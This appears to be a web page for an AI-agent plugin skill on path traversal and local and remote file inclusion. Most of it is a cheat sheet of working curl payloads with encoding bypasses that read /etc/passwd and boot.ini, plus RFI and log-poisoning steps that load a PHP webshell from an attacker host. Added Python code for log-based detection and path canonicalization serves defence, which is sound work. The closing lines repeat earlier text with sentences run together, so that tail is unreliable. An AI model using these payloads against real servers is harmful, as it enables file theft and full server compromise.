From meta
Exploit path traversal and local/remote file inclusion (LFI/RFI) via URL parameters, cookies, and hidden fields using ../ sequences, URL encoding (%2e%2e%2f), double encoding (%252e%252e%255c), Unicode bypasses (..%c0%af), and Windows UNC paths. PHP include/require with $_GET/$_POST/$_COOKIE pattern. Target /etc/passwd, boot.ini, web.config. Tools: DotDotPwn, WFuzz, Burp Suite, ZAP.
npx claudepluginhub securityfortech/hacking-skills --plugin meta
Applications that construct file paths from user-supplied input without proper canonicalization
and boundary enforcement allow attackers to escape the intended directory. On Linux/Unix, this
enables reading /etc/passwd, SSH keys, application configuration files, and source code. On
Windows, boot.ini, win.ini, and SAM hive files become accessible. Remote File Inclusion (RFI)
extends the impact to arbitrary code execution by loading attacker-controlled URLs as server-side
scripts. Inadequate sanitization — including blacklisting only specific sequences — is routinely
bypassed through encoding variants.
Indicators:
- Parameter names: file=, path=, item=, page=, template=, home=, style=, lang=
- Cookies such as TEMPLATE=flower or PSTYLE=GreenDotRed containing file references
- Source pattern: (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

Methodology:
- Send ../ sequences against each candidate parameter; observe response differences (size, content, error messages).
- Try filter-evasion variants (....//, spaces, extra periods, backslash mixing).
- Test Unix targets (/etc/passwd) and Windows targets (../../boot.ini, ../../windows/win.ini).
- Try http://, https://, ftp://, file:// prefixes for remote inclusion.
- Try PHP wrappers (php://filter, php://input, data://), log poisoning, and session file inclusion chains.

```bash
# Basic traversal — Unix
curl "https://TARGET/getUserProfile.jsp?item=../../../../etc/passwd"
curl "https://TARGET/index.php?file=../../../etc/passwd"
# Basic traversal — Windows
curl "https://TARGET/index.asp?file=..\..\..\..\boot.ini"
curl "https://TARGET/index.asp?file=../../../../windows/win.ini"
# URL encoding bypass
curl "https://TARGET/index.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# ../ = %2e%2e%2f
# Double URL encoding bypass
curl "https://TARGET/index.php?file=%252e%252e%255cetc%255cpasswd"
# Unicode/UTF-8 bypass
curl "https://TARGET/index.php?file=..%c0%afetc%c0%afpasswd"
curl "https://TARGET/index.php?file=..%c1%9cwindows%c1%9cwin.ini"
# Sanitization bypass — nested sequences (defeats Replace("../",""))
curl "https://TARGET/index.php?file=....//....//etc/passwd"
curl "https://TARGET/index.php?file=....\\....\\boot.ini"
# Windows UNC path
curl "https://TARGET/index.php?file=\\\\ATTACKER\\share\\malicious.txt"
# Remote file inclusion
curl "https://TARGET/index.php?file=http://ATTACKER/shell.txt"
curl "https://TARGET/index.php?file=ftp://ATTACKER/shell.txt"
# PHP filter wrapper (LFI — read source base64 encoded)
curl "https://TARGET/index.php?file=php://filter/convert.base64-encode/resource=index.php"
# Cookie-based traversal
curl "https://TARGET/page" -H "Cookie: PSTYLE=../../../../etc/passwd"
# DotDotPwn automated scan
dotdotpwn -m http -h TARGET -f /etc/passwd -k "root:" -d 6
# WFuzz path traversal fuzz
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/Traversal.txt \
  "https://TARGET/index.php?file=FUZZ"
```
Bypass notes:
- ../../../etc/passwd%00.jpg — null byte truncates the extension check (PHP < 5.3.4).
- ... /, ..%20/, .... — confuse regex-based filters.
- ..\/ or ..\\/ — bypass OS-specific separator checks.
- /etc/passwd — absolute path.
- php://filter, data://text/plain;base64,..., expect://id — PHP stream wrappers.

Scenario 1 — Read /etc/passwd via URL Parameter
Setup: https://TARGET/getUserProfile.jsp?item=ikki.html serves profile content from disk.
Trigger: Change item=../../../../etc/passwd; server returns passwd file content in response.
Impact: Username enumeration, identification of service accounts, OSINT for further attacks.
Scenario 2 — LFI via Cookie to Code Execution (Log Poisoning)
Setup: LFI confirmed via TEMPLATE cookie; application logs User-Agent to a predictable path.
Trigger: Send request with User-Agent: <?php system($_GET['cmd']); ?> to poison the log file;
then include log via LFI with cmd=id.
Impact: Remote code execution on the server.
Scenario 3 — RFI for Webshell Deployment
Setup: PHP include($_GET['page']) without allow_url_fopen=Off.
Trigger: page=http://ATTACKER/webshell.txt — attacker hosts a PHP webshell as .txt to bypass
extension checks; server fetches and executes it.
Impact: Full server compromise via interactive webshell.
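Every encoding variant in the command list and bypass notes above (single and double URL encoding, overlong UTF-8 slashes, backslash mixing, nested ....// sequences, null bytes, PHP wrappers, remote schemes, UNC paths) collapses to a handful of shapes once a parameter value is decoded the way a lenient server would decode it. The following detection logic is an added example written for this page, not code from the skill or its author: it normalizes each query and cookie value from access-log lines and labels what it finds. The log lines in SAMPLE_LOG are constructed, in Apache "combined" format with one assumed extra quoted field carrying the Cookie header; TARGET and ATTACKER placeholders follow the page's convention.

```python
"""Log-side detection of traversal / inclusion probes (added example)."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (not from any real system): combined format
# plus a final quoted field holding the Cookie header (assumed custom LogFormat).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /getUserProfile.jsp?item=ikki.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "PSTYLE=GreenDotRed"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /getUserProfile.jsp?item=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=%252e%252e%255cetc%255cpasswd HTTP/1.1" 200 2048 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?file=..%c0%afetc%c0%afpasswd HTTP/1.1" 200 2048 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?file=....//....//etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9000 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?file=http://ATTACKER/shell.txt HTTP/1.1" 200 300 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /page HTTP/1.1" 200 300 "-" "curl/8.0" "PSTYLE=../../../../etc/passwd"',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?file=../../../etc/passwd%00.jpg HTTP/1.1" 200 300 "-" "curl/8.0" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /index.php?file=\\\\ATTACKER\\share\\malicious.txt HTTP/1.1" 200 300 "-" "curl/8.0" "-"',
]

LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)

# Overlong (invalid) UTF-8 encodings of '/', '\' and '.' that some decoders
# historically accepted; fold them to the character they were meant to smuggle.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b"."}


def normalize(raw: str) -> str:
    """Decode a value as a permissive server would, so the checks below see what
    the filesystem would see. URL decoding is capped at three rounds."""
    data = raw.encode("utf-8", "surrogateescape")
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, replacement in OVERLONG.items():
        data = data.replace(seq, replacement)
    # latin-1 never fails to decode, so arbitrary bytes survive into the regexes.
    return data.decode("latin-1").replace("\\", "/")


def classify(value: str) -> list[str]:
    """Return the suspicious shapes found in one (normalized) parameter value."""
    v = normalize(value)
    reasons = []
    # Two or more dots then a separator covers ../, ..\, ....//, "... /", "..%20/".
    if re.search(r"\.{2,}\s*/", v):
        reasons.append("dot-dot-traversal")
    if "\x00" in v:
        reasons.append("null-byte")
    if re.match(r"(php|data|expect|phar|zip|glob)://", v, re.IGNORECASE):
        reasons.append("php-wrapper")
    if re.match(r"(https?|ftp|file)://", v, re.IGNORECASE):
        reasons.append("url-scheme")
    # After backslash folding, a UNC path \\host\share starts with //.
    if v.startswith("//"):
        reasons.append("unc-path")
    return reasons


def scan_line(line: str) -> list[str]:
    """Return findings for one log line as 'location:name:reason' strings."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed-line"]
    findings = []
    path, _, query = m.group("target").partition("?")
    findings += [f"path:{r}" for r in classify(path)]
    for pair in (query.split("&") if query else []):
        name, _, value = pair.partition("=")
        findings += [f"query:{name}:{r}" for r in classify(value)]
    cookie = m.group("cookie")
    for pair in (cookie.split(";") if "=" in cookie else []):
        name, _, value = pair.strip().partition("=")
        findings += [f"cookie:{name}:{r}" for r in classify(value)]
    return findings


def scan_log(lines) -> dict[int, list[str]]:
    """Map line index -> findings for every line with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := scan_line(line))}


if __name__ == "__main__":
    for idx, found in scan_log(SAMPLE_LOG).items():
        print(idx, found)
```

Normalizing before matching is the point: a rule that looks for the literal string `../` misses every line above except the first probe, while this classifier flags all nine probes and leaves the benign request alone. Any contained `..` (such as `css/../x`) is also flagged, which is the right bias for a detection rule that feeds an analyst rather than a blocking decision.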
False positives:
- file= may reference an internal enum or database key, not an actual filesystem path; confirm by observing whether traversal sequences produce different responses.
- ../ in a URL fragment that appears in logs but is normalized by the framework before reaching application code is not exploitable.

Remediation:
- Canonicalize with realpath() (PHP) or equivalent; verify the resolved path starts within the allowed base directory before opening.
- Disable allow_url_include and allow_url_fopen in PHP configuration.
- Flag .., %, \, / sequences in file-referencing parameters.

Path traversal is an [[authz-bypass]] on the filesystem — the attacker escapes an intended directory boundary in the same way a session swap escapes a user boundary. When LFI chains to RCE via log poisoning, the code execution primitive is identical to [[cmd-injection]]. If the traversal target is a URL rather than a file path, look at [[ssrf]] for how server-side URL fetching can reach internal resources. In mobile apps, [[mobile-platform-interaction]] covers path traversal via Content Provider URIs.
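The canonicalize-then-check remediation above (realpath() plus a base-directory containment test) is the one fix that holds against every bypass listed on this page, because it decides on the resolved path rather than on the input's spelling. The following is an added example in Python, not the skill's code and not PHP's realpath(): it applies the same technique with os.path.realpath and a positional commonpath check. TEMPLATE_ROOT is a constructed directory that need not exist; the function name resolve_under_base and the PathEscapeError type are this example's own. The input is assumed to have been URL-decoded exactly once by the web framework and never decoded again.

```python
"""Canonicalize-then-check path resolution (added example, Unix path semantics)."""
import os

# Constructed base directory for the examples below (assumption, not a real deployment path).
TEMPLATE_ROOT = "/srv/app/templates"


class PathEscapeError(ValueError):
    """Raised when a user-supplied path would resolve outside the base directory."""


def resolve_under_base(base_dir: str, user_path: str) -> str:
    """Return the canonical absolute path for user_path inside base_dir, or raise.

    Containment is checked with os.path.commonpath, not a string prefix, so a
    sibling such as /srv/app/templates-old cannot slip past it.
    """
    # Embedded NUL bytes were used to truncate extension checks in old PHP;
    # they are never legitimate in a filename.
    if "\x00" in user_path:
        raise PathEscapeError("NUL byte in path")
    # A URL scheme has no place in a filesystem reference; in PHP include() it
    # is what turns LFI into RFI when allow_url_include is on.
    if "://" in user_path:
        raise PathEscapeError("URL scheme in path")

    base_real = os.path.realpath(base_dir)
    # os.path.join discards base_dir when user_path is absolute ("/etc/passwd"),
    # which is why the containment check must run on the realpath result.
    candidate = os.path.realpath(os.path.join(base_real, user_path))

    if candidate == base_real or os.path.commonpath([base_real, candidate]) != base_real:
        raise PathEscapeError(f"{user_path!r} resolves outside {base_real}")
    return candidate


def is_safe(base_dir: str, user_path: str) -> bool:
    """Boolean form of resolve_under_base for validation layers and tests."""
    try:
        resolve_under_base(base_dir, user_path)
        return True
    except PathEscapeError:
        return False


if __name__ == "__main__":
    # Constructed probes mirroring the payload shapes used elsewhere on this page.
    for probe in ["flower.html", "css/../flower.html", "../../../etc/passwd",
                  "/etc/passwd", "../../../etc/passwd\x00.jpg",
                  "....//....//etc/passwd", "http://ATTACKER/shell.txt"]:
        verdict = "allow" if is_safe(TEMPLATE_ROOT, probe) else "deny "
        print(f"{verdict} {probe!r}")
```

Note what happens to the nested ....// payload: after canonicalization it is a literal directory named "...." inside the base, so it is allowed as a harmless in-bounds path rather than needing its own blacklist entry. That is the difference between deciding on the resolved path and deciding on the input string. PHP's realpath() returns false for paths that do not exist, so a PHP port must treat false as a rejection before comparing.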
within the allowed base directory before opening.allow_url_include and allow_url_fopen in PHP configuration.., %, \, / sequences in file-referencing parameters.Path traversal is an [[authz-bypass]] on the filesystem — the attacker escapes an intended directory boundary in the same way a session swap escapes a user boundary. When LFI chains to RCE via log poisoning, the code execution primitive is identical to [[cmd-injection]]. If the traversal target is a URL rather than a file path, look at [[ssrf]] for how server-side URL fetching can reach internal resources. In mobile apps, [[mobile-platform-interaction]] covers path traversal via Content Provider URIs.